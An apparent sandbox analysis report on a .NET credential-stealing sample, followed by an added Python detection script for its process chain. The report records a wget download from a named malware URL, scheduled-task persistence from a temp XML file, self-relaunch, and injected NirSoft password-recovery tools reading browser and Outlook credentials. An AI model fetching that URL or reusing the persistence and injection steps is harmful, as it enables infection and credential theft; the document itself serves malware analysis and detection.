Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
Queries processor information via WMI (Win32_Processor.ProcessorId, a value commonly used as a hardware-based host identifier)
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
Reads ini files
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeFile read: C:\Users\user\Desktop\desktop.ini
Reads software policies (wget.exe is the analysis harness's download step, not the sample)
Source: C:\Windows\SysWOW64\wget.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file (same harness wget.exe step)
Source: C:\Windows\SysWOW64\wget.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wget.exeFile read: C:\Windows\System32\drivers\etc\hosts
SQL strings found in memory and binary data (these are SQLite engine internals, the VACUUM and table-rename statement templates, so an SQLite library is embedded; WebBrowserPassView, whose debug path appears in the same memory region below, reads browser credential stores kept in that format)
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exe, 00000008.00000002.1978302785.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Spawns processes (vbc.exe is the Visual Basic compiler and has no /stext switch; /stext is the NirSoft "save as text" option, so the two vbc.exe children run injected password-recovery code, matching the WebBrowserPassView and mailpv debug paths recovered from vbc.exe memory below; the sample also relaunches a copy of itself, the process 7 instance in which the unpacked payload above was matched)
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe' > cmdline.out 2>&1
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe'
Source: unknownProcess created: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe 'C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TPykFAdhwNOvb' /XML 'C:\Users\user\AppData\Local\Temp\tmpC925.tmp'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpD3D3.tmp'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpC597.tmp'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe'
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TPykFAdhwNOvb' /XML 'C:\Users\user\AppData\Local\Temp\tmpC925.tmp'
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess created: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpD3D3.tmp'
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpC597.tmp'
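The process chain listed above, turned into detection logic. This is an added example and not part of the Joe Sandbox report: it models the process creations as Sysmon-style records (parent image, image, command line) and flags the three behaviours worth alerting on: a .NET compiler process given the NirSoft /stext switch, a scheduled task created from an XML file in the user's temp folder, and a process that relaunches a copy of itself. The record layout, the two benign control rows and the inclusion of csc.exe beside vbc.exe are assumptions; the harness's own cmd.exe/wget row is included to show that it is not flagged.

```python
"""Added example (not Joe Sandbox code): triage of process-creation records shaped like
the 'Spawns processes' lines above. Record layout, the benign control rows and the
compiler-host list beyond vbc.exe are assumptions."""
import ntpath
import re

SAMPLE = r"C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe"
VBC = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
# vbc.exe is the host seen in the report; csc.exe is an assumed sibling worth the same rule.
NET_COMPILER_HOSTS = {"vbc.exe", "csc.exe"}
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.IGNORECASE)


def basename(path: str) -> str:
    return ntpath.basename(path.strip("'\"")).lower()


def analyze(record: dict) -> list:
    """Return the reasons a single process-creation record deserves an alert."""
    image, parent, cmd = basename(record["image"]), basename(record["parent"]), record["cmdline"]
    hits = []
    # Compilers take no /stext switch; NirSoft tools use it to write their output as text,
    # so a compiler process carrying it is running injected password-recovery code.
    if image in NET_COMPILER_HOSTS and re.search(r"(?i)(^|\s)/stext\b", cmd):
        hits.append("compiler host given NirSoft /stext output switch")
    # Persistence: task created from an XML definition dropped in the user's temp folder.
    if image == "schtasks.exe" and re.search(r"(?i)/create\b", cmd):
        xml = re.search(r"(?i)/xml\s+'?([^'\s]+)", cmd)
        if xml and TEMP_DIR.search(xml.group(1)):
            hits.append("scheduled task created from XML in %TEMP%")
    # A binary relaunching an identical copy of itself is the usual hollowing/RunPE staging step.
    if record["image"].strip("'\"").lower() == record["parent"].strip("'\"").lower():
        hits.append("process spawned a copy of itself")
    return hits


def triage(records) -> list:
    """Return (index, image basename, reasons) for every record with at least one hit."""
    alerts = []
    for i, rec in enumerate(records):
        hits = analyze(rec)
        if hits:
            alerts.append((i, basename(rec["image"]), hits))
    return alerts


# Constructed records modelled on the report's process tree (rows 0 to 4), plus two
# constructed benign controls (rows 5 and 6) that the rules must not flag.
RECORDS = [
    {"parent": r"C:\Windows\SysWOW64\cmd.exe", "image": r"C:\Windows\SysWOW64\wget.exe",
     "cmdline": r"wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate "
                r"'http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe'"},
    {"parent": SAMPLE, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TPykFAdhwNOvb' "
                r"/XML 'C:\Users\user\AppData\Local\Temp\tmpC925.tmp'"},
    {"parent": SAMPLE, "image": SAMPLE, "cmdline": SAMPLE},
    {"parent": SAMPLE, "image": VBC,
     "cmdline": "'" + VBC + r"' /stext 'C:\Users\user\AppData\Local\Temp\tmpD3D3.tmp'"},
    {"parent": SAMPLE, "image": VBC,
     "cmdline": "'" + VBC + r"' /stext 'C:\Users\user\AppData\Local\Temp\tmpC597.tmp'"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
    {"parent": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe", "image": VBC,
     "cmdline": VBC + " /noconfig /out:app.exe Program.vb"},
]

if __name__ == "__main__":
    for idx, image, reasons in triage(RECORDS):
        print(f"[{idx}] {image}: " + "; ".join(reasons))
```

Run stand-alone, it reports rows 1 to 4 (schtasks, the self-relaunch and both vbc.exe children) and stays silent on the wget row and the two controls, including a legitimate MSBuild-driven vbc.exe compile. The /stext rule is the high-confidence one here: there is no benign reason for a .NET compiler to receive that switch.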
Uses an in-process (OLE) Automation server (wget.exe is the analysis harness's download step)
Source: C:\Windows\SysWOW64\wget.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32
Tries to open an application configuration file (.cfg)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg
Found graphical window changes (likely an installer)
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft Silverlight (signature label only: the file opened below is mscorrc.dll, the .NET Framework v2.0.50727 runtime resource library, so this is ordinary CLR activity rather than Silverlight)
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed (the key read below holds stored Outlook mail-account settings and is opened by vbc.exe, in which the mailpv debug path was also found, so this fits mail-credential harvesting rather than a version check)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Uses new MSVCR Dlls
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Binary contains paths to debug symbols (WebBrowserPassView and mailpv are NirSoft password-recovery utilities, embedded here and run inside vbc.exe; CyaX and FormatSources are the sample's own .NET stages)
Source: Binary string: C:\Users\Cassandra\Desktop\Premium\CyaX\CyaX\obj\Debug\CyaX.pdb source: qaxCr0UKyI0yfkE.exe, 00000004.00000002.1973693827.0000000002FF0000.00000004.00000001.sdmp
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exe
Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, vbc.exe
Source: Binary string: C:\Users\Vendetta\source\repos\FormatSources\FormatSources\obj\Debug\FormatSources.pdb source: qaxCr0UKyI0yfkE.exe, qaxCr0UKyI0yfkE.exe.2.dr
Source: Binary string: mscorrc.pdb source: qaxCr0UKyI0yfkE.exe, 00000004.00000002.1976827425.0000000004FF0000.00000002.00000001.sdmp, qaxCr0UKyI0yfkE.exe, 00000007.00000002.2385190996.0000000008450000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker (Assembly.Load(byte[]) runs an assembly straight from a memory buffer, the usual hand-off from a .NET crypter to its decrypted payload)
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/menay.cs.Net Code: UXiSZOcCZRxIyvroWqXdVnGqAozbSVLRi System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/menay.cs.Net Code: UXiSZOcCZRxIyvroWqXdVnGqAozbSVLRi System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/menay.cs.Net Code: UXiSZOcCZRxIyvroWqXdVnGqAozbSVLRi System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/menay.cs.Net Code: UXiSZOcCZRxIyvroWqXdVnGqAozbSVLRi System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/menay.cs.Net Code: UXiSZOcCZRxIyvroWqXdVnGqAozbSVLRi System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.qaxCr0UKyI0yfkE.exe.cf0000.0.unpack, MonoGame.UI.Forms/menay.cs.Net Code: UXiSZOcCZRxIyvroWqXdVnGqAozbSVLRi System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004449B3 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_004449B3
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 4_2_0075755C push ebp; retf 4_2_00757560
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 4_2_007577D6 push AD1B205Ah; retf 4_2_007577E6
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 4_2_02BF3B9D push es; ret 4_2_02BF3B9E
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 4_2_02BF0B0D push esi; iretd 4_2_02BF0B0F
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 4_2_02BF377A push ss; retf 4_2_02BF3781
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 4_2_02BF24E8 push ebp; retf 4_2_02BF24EA
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_00CF77D6 push AD1B205Ah; retf 7_2_00CF77E6
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_00CF755C push ebp; retf 7_2_00CF7560
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 7_2_055199E0 pushfd ; iretd 7_2_055199E1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00445190 push eax; ret 8_2_004451A4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00445190 push eax; ret 8_2_004451CC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00449EB4 push eax; ret 8_2_00449EC1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00444F79 push ecx; ret 8_2_00444F89
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00412341 push ecx; ret 12_2_00412351
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00412360 push eax; ret 12_2_00412374
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00412360 push eax; ret 12_2_0041239C
Binary may include packed or encrypted code
Source: initial sampleStatic PE information: section name: .text entropy: 7.94237630013
Source: initial sampleStatic PE information: section name: .text entropy: 7.94237630013
.NET source code contains many randomly named methods
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/BAXyVpJquGzWGCp.csHigh entropy of concatenated method names: 'dewtyKSWfZDrUqzYgOBzBuhpTJhlaTPVTWN', 'mRZOcRfsOIrSasCPZsfXyDJmgEljIaGnywL', 'WGAXUWQttigXHSjULDSxzLaCEnKRUokZjZ', 'OnapuhBabseDxeobiuhBYORFkiOCvCHzRXe', '.ctor', 'DWcOonqjenmLWcfTXWrLQfXTGdUrVNJIG', 'xcLEaUYGtuWPSGKShQhXFQnUHLXJVzeUK', 'riNxwPZbrcilZebGjInQDwLCdDjAFKAtX', 'gJcbPtkfXJbwYSRyyefeogloOaArvexHVqlI', 'GiqbdFmlgHLcItTlXNHSbbavLXCVSEUhGc'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/Tester/cfSLS.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'UqyixXZotxFwemAKnrfbbvpTJYlultHZab', 'TAtIRRdGNmSvPYXhQrGmgpHQjGWDGNRZJRXN', 'zXDseRDtApxZRkFwnqNXJTuAXWORtfYAuI', 'CZFWScJHuzmtpnAIDUnFqFFehmZoNvEOFX', 'xZfCfRtwnSaJkaLcQNdlIiySssQIHPJJhgrJ', 'xHzXOBheKniPhRCRvcffFQPwecsGXzQrueqP', 'TkOOKeZDrHldDdxZwHeZykKfDQinBtRfEsBt', 'DTcAYVBdeBwIBYehNuRfmxXkXcFNsyOWghi'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/Effects/vhvCnScudaJK.csHigh entropy of concatenated method names: 'hUDZPtPegJkNKjAQtSXnsYNQnSgZbVFfCWKl', 'uiHaITXlczBZqOAyGrjPIdcBGHTketejnkx', 'UAUytDxZFsInLaoALSKxKNEhjjUcIfFatdO', 'BqijaxCHyxTpyjUQarhBUikFFyNdmbbzY', '.ctor', 'IqXpbZSuWtqDEuFfeHOlEtxPhUVaERuCFG', 'chebPveURZsDZjYlmzwzKETsLHCQEBBtBD'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/SsrXqWqckQCrvj.csHigh entropy of concatenated method names: 'iOlHdQhTAckufgLtRppNFsyRTRTRAuOpl', 'ntQBshxAxOozJPaiITngKwXEGaIXSLTSiDG', 'rQpXQvpBpwUnNWtcdrXwGWdYmTIlYTvFQhGt', 'WddkqzCksggJbQVPBlIWfRcXFHkTRLBPSqL', 'hHZyUSGiUfHBHjEpekDljRybUVLxldVlp', 'sYVCdVKrHenpXpmNJldowLAAcbOLzGxhv', '.ctor', 'QZApokZdmFgBOqIoDuRGzRWKfSlpriSZmBf'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/dUGNSEqE.csHigh entropy of concatenated method names: 'OXhzvPIABrXbcyVvicyRZSYurCktHiINxZV', 'ockpwrLEjmnEKHJbelrGCgpjQkEZJxXeWi', 'ktwZdqOPmNSXRcwPwJUHgEGSBESoKgXuGf', 'AbuZFGWzNwbzeijGdirGlFhhXPgQKarTu', 'fRmTJeeDeNXVoHBtQwQFVKfSvDstydQnaQw', 'jpOOHojEixDcDoBhdlGHcjForJVIHbvDUG', '.ctor', 'qFBQtbZUopyavnAzeQLojkCpInkSDcBEc', 'iKQUOKFLTyiZDsWFtJoLInzFLyxOLQhKidJ', 'RmhVNLaSAQInSFRbtNtGhSmxJLzJbouwq'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/wyCYmZnQYaRwVkKC.csHigh entropy of concatenated method names: '.ctor', 'JFoDjtSuqKLyZZsHdOpbQZysPvNVeGGYSgB', 'WGcNWBAiLSRoiPkrtZzsVICeLyFrsefzY', 'JOUmGDdmyfJfAAAAlewLKzuvpIXHnaEdqkdx', 'dZcpcvCTfQkmkWwELGibEahiJcqXATdzbjnb', 'OhxnCpqlspGKeRgkNcwZOfBwqrECwkSqewU', 'kmbNxYmxjzbLYrjZbFGqVbCekhpvdGlWU'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/CWfA.csHigh entropy of concatenated method names: 'mCtmKpVVqzoglaBaJAWBPoIVKIYUfANdADw', 'NXFUfFGpDlNQWuhPTqlIjfuIaRjPhzCRT', 'rtgaXNXRKurmBwzsltPSFucPvtLlvcXliqUQ', 'SiDkkEGrmJSgNPamndmVIRDJyWuvsAlVxKn', 'QPLixCsHvlKGnFZisNiuKgYhxibQozsGHv', 'vANkHcuRGBmxiTPsQsfFrsrEDfbAUeieBw', 'fnUGNNLJCKNWezaUcRWBcVSJbcufmtIwW', 'FHDcFDfRLPpiQCUuEShUDRhSHkRLYjKaBN', 'dWOCmniVlkzGamqYvpxBEKNoQIrIkrnllwea', 'uxrxnlmKRartbTaYLcNxEmcKcnYgKqcovHn'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/UXJYzIYriAOH.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'uyDZqofGJxNuQnXVKOFRBFRVQVUJTwnAkSJ', 'GIvhGLTjoGHfIgFyKQWsBYmCJPDIHTpKcrLa', 'gzeHoiQbtyCmRYBJTcRJcHbjCOVagNNXm', 'bpmlxhwvRZIDqjvWIlaKvFWJVWeafdFTI', 'wOEokzOWrXhvGtNFDIDXUClAgtxozyiJnt', 'lvojSbJxFvrWNUvtKzPdIwjdidycXTltoZ', 'QmKCwKspWHHmgBzqDiFAjFHgDZnTVhvvfL', 'lLBJBjmXBmotOtRbLmdYyLJnDetTpRCFcHwi'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/DtmJmghRepJRjNS.csHigh entropy of concatenated method names: '.ctor', 'jmOiwttsbqsBRaghzInUdqJAjBvhZeXFXvel', 'lKQkCJneWysHnpdvOzkhIBJeIFjctbeuiXC', 'ySAxwbPomrVrryIRdAgEOCFKGYhwVYTYlm', 'wxpWQOvEXnKyuUBdbypWLoBKTxoIaZbjA', 'uuqhqPnIrAimvHUKvjCyQFkqwQzERAKFX', 'RcDoOKXXmRmDVZZVaHrDrtkFqfmhCrlKzTLx', 'aKfrYnYlZGqJnrBixkYNcaUzkwmrmeRSL', 'tuXDaLHhPnrzFzjZWlucsRqsZATNWKJafVz', 'PbjIQuPLngJFJULyHqzJuoIYWKgOZiVJzZiS'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/yhsvcD.csHigh entropy of concatenated method names: 'vgiqbpdsZZSRjijojrDZvTzVcFFxbsIkNZ', 'AoFkEdiPzhsREvNOuQILtKXaTPcKDOsxTcco', 'atAJajxGtiOyGLfESKJgVArJBuwJgiqoulIJ', 'nDntvBRtAnUEXJdIObGnqZLthRQVuQNvsvr', 'kmOEoHTZxFLbYVamajnFfgXYJkeGlRKIrr', 'GwjLrYntBNBmQwZqhubOYrReSHFHQHCax', 'hXUjHwZlgAaxvAvfidKORirFyBKSJBLTz', 'vFIcxNDXiWaNNyvSXowNYTiKLaKooWhJTqq', 'dyDcYKFyKxqXHJYDJYHEaiRDYslzNymVrcG', 'ZLoQNttqDoYmqNfokBgWtWNHxnzuDXeJzeA'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/VfG.csHigh entropy of concatenated method names: 'ilHNbxekpbZzUXAGaNbmXJXjbjJvaOdUTm', 'XRbcCfJitFSNScjYuZsVghvmWuETiQsfFi', 'epIDDuRbTcyRWkcIaTuVLHAsqEEnsRcpg', 'jKwgQEjCtWunEBZJyVzqzCdbvDpRtdwqCgs', 'oZxYEKFlSJJQuEfDxvDfjaluBZPhRXvuxVFz', 'HZHmZOtpVDbpoKfalkAVWfUOonGHxAuoG', 'cmuSIsFedHKWdijcZfGdUgxhXDRyBrJztcfI', 'leooCrCBwxfnCBDKlVRuyJJZUOroNnbHZIeK', '.ctor', 'uEQsgQfNDNEVvTfXXDDIqFOEjzWnrKqbjB'
Source: qaxCr0UKyI0yfkE.exe.2.dr, MonoGame.UI.Forms/JRecbvfNSTtx.csHigh entropy of concatenated method names: 'BqqcTlipHuGvbJvmKWXOLCjgvOdDlYgjRr', 'OepSWjFbaFHdyVxvKmFVDeOANCuxJpJbKxix', 'YhYznSTazUwClxAHqyAnarkkydGkJeZcwXst', 'WwKxxzmGPYyFKnkHejkEBgfsVdlkSTZvoUfN', 'wmlPtlARIyfDYviqoetAOYsalWSdQqcYFtC', 'DqIIdpKmQqsILXHxmRFbxgijWUneIPUNWQxN', 'jPTXeqUQnLjyYAHJHzsykQJZtSsUgRVpIFi', 'keFRNXqCuphsJqfLHXFQHLAJjFqsZCubKEb', 'APFQzYwPugLdjnkVfaZGwarKlfEnKqORps', 'oweGxzapGJRTdNbtWwhWEQYCiyrWKyYhr'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/BAXyVpJquGzWGCp.csHigh entropy of concatenated method names: 'dewtyKSWfZDrUqzYgOBzBuhpTJhlaTPVTWN', 'mRZOcRfsOIrSasCPZsfXyDJmgEljIaGnywL', 'WGAXUWQttigXHSjULDSxzLaCEnKRUokZjZ', 'OnapuhBabseDxeobiuhBYORFkiOCvCHzRXe', '.ctor', 'DWcOonqjenmLWcfTXWrLQfXTGdUrVNJIG', 'xcLEaUYGtuWPSGKShQhXFQnUHLXJVzeUK', 'riNxwPZbrcilZebGjInQDwLCdDjAFKAtX', 'gJcbPtkfXJbwYSRyyefeogloOaArvexHVqlI', 'GiqbdFmlgHLcItTlXNHSbbavLXCVSEUhGc'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/UXJYzIYriAOH.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'uyDZqofGJxNuQnXVKOFRBFRVQVUJTwnAkSJ', 'GIvhGLTjoGHfIgFyKQWsBYmCJPDIHTpKcrLa', 'gzeHoiQbtyCmRYBJTcRJcHbjCOVagNNXm', 'bpmlxhwvRZIDqjvWIlaKvFWJVWeafdFTI', 'wOEokzOWrXhvGtNFDIDXUClAgtxozyiJnt', 'lvojSbJxFvrWNUvtKzPdIwjdidycXTltoZ', 'QmKCwKspWHHmgBzqDiFAjFHgDZnTVhvvfL', 'lLBJBjmXBmotOtRbLmdYyLJnDetTpRCFcHwi'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/SsrXqWqckQCrvj.csHigh entropy of concatenated method names: 'iOlHdQhTAckufgLtRppNFsyRTRTRAuOpl', 'ntQBshxAxOozJPaiITngKwXEGaIXSLTSiDG', 'rQpXQvpBpwUnNWtcdrXwGWdYmTIlYTvFQhGt', 'WddkqzCksggJbQVPBlIWfRcXFHkTRLBPSqL', 'hHZyUSGiUfHBHjEpekDljRybUVLxldVlp', 'sYVCdVKrHenpXpmNJldowLAAcbOLzGxhv', '.ctor', 'QZApokZdmFgBOqIoDuRGzRWKfSlpriSZmBf'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/Effects/vhvCnScudaJK.csHigh entropy of concatenated method names: 'hUDZPtPegJkNKjAQtSXnsYNQnSgZbVFfCWKl', 'uiHaITXlczBZqOAyGrjPIdcBGHTketejnkx', 'UAUytDxZFsInLaoALSKxKNEhjjUcIfFatdO', 'BqijaxCHyxTpyjUQarhBUikFFyNdmbbzY', '.ctor', 'IqXpbZSuWtqDEuFfeHOlEtxPhUVaERuCFG', 'chebPveURZsDZjYlmzwzKETsLHCQEBBtBD'
